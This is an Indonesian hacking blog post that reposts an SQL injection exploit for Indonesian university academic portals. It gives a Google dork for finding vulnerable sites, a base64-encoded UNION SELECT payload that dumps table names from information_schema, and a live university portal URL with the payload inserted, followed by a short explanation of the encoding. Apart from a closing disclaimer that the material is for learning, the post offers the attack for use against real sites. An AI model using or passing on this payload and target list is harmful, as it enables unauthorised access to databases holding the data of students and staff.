Base64 SQL Injection pada Situs Akademik Indonesia

Base64 SQL Injection pada Situs Akademik Indonesia - Hai Semua, selamat datang di blog Noob1t4, Pada Artikel yang kalian baca kali ini dengan judul Base64 SQL Injection pada Situs Akademik Indonesia, kami telah mempersiapkan artikel ini dengan baik untuk kalian baca dan ambil informasi didalamnya. mudah-mudahan isi postingan yang kami tulis ini dapat kalian pahami. baiklah, selamat membaca.

Tadi malam iseng jalan jalan di salahsatu grup underground terkenal di Indonesia, dan ada yang share ‘bug’ SQLi base64 pada banyak situs akademik (ac.id). Query nya pun hampir sama semua. Sehingga saat kalian menemukan situs yang memiliki celah ini, cukup memasukkan ‘exploit’ nya , dan isi database akan kelihatan.



See how its work :

# Exploit Title: Indonesian University Base64 SQL Injection

# Google Dork: news/berita-kampus-MQ== ( use your brain b!tch )

# Date: [04 – 05 – 2016 23:51]

# Exploit Author: Defacer Tersakiti

# Tested on: Ubuntu Linux, Windows

Exploit :

• LTEnIFVOSU9OIFNFTEVDVCAxLDIsZ3JvdXBfY29uY2F0KHRhYmxlX25hbWUsMHgzYzYyNzIzZSksNCw1LDYsNyw4LDkgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIHdoZXJlIHRhYmxlX3NjaGVtYT1kYXRhYmFzZSgpLS0gLQ==

Simple Exploit

Kita ambil contoh situs Siakad Universitas Kanjuruhan Malang :

• http://siakad.unikama.ac.id/index.php/news/berita-kampus-MQ==

Sekarang ganti MQ== dengan query injection diatas :

• http://siakad.unikama.ac.id/index.php/news/berita-kampus-LTEnIFVOSU9OIFNFTEVDVCAxLDIsZ3JvdXBfY29uY2F0KHRhYmxlX25hbWUsMHgzYzYyNzIzZSksNCw1LDYsNyw4LDkgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIHdoZXJlIHRhYmxlX3NjaGVtYT1kYXRhYmFzZSgpLS0gLQ==

Boom… database kebuka.

Oke disini saya akan menjelaskan bagaimana cara kerja nya :

diatas ada kode MQ== . MQ== adalah bentuk base64 dari 1 .

Silahkan didecode di situs online atau kalau kalian menggunakan linux bisa test via terminal.

base64 -d <<< MQ==

Maka outpunya adalah angka 1.

Nah, sekarang kita ganti MQ== dengan MSc= maka isi berita nya akan blank. Kenapa MSc= ? MSc= adalah bentuk encode base64 dari 1′ .

akame@linuxsec: $ echo -n 1' | base64
MSc=

Yup, kita memberi string dibelakang angka untuk mengecek apakah error atau tidak.

Nah sekarang kalian tau kan kode exploit diatas berasal dari mana. Yup, dari hasil encode query berikut :

• -1′ UNION SELECT 1,2,group_concat(table_name,0x3c62723e),4,5,6,7,8,9 from information_schema.tables where table_schema=database()– –

Oke mungkin sekian dulu penjelasan singkat dari saya.

Untuk dasar SQL Injection Base64 bisa dilihat disini :

SQL Injection Base64 Tutorial

baiklah sekian dulu post kali ini, sihalkan dikembangkan, jika ada kebingungan silahkan komentar. Share juga ke teman temanmu biar mereka tau.

Sumber http://noob1t4.blogspot.com/

Sekian Artikel Base64 SQL Injection pada Situs Akademik Indonesia.

Terima kasih telah membaca artikel Base64 SQL Injection pada Situs Akademik Indonesia, mudah-mudahan bisa memberi manfaat untuk kalian semua. Baiklah, sampai jumpa di postingan artikel lainnya.

Semua artikel tutorial di blog ini hanya untuk sebatas Pembelajaran dan Pengetahuan saja, jika kalian meyalahgunakan tutorial di blog ini, itu bukan tanggung jawab saya. Terima kasih sudah berkunjung ke blog Noob1t4, saya harap agan berkunjung kembali kesini

Share this post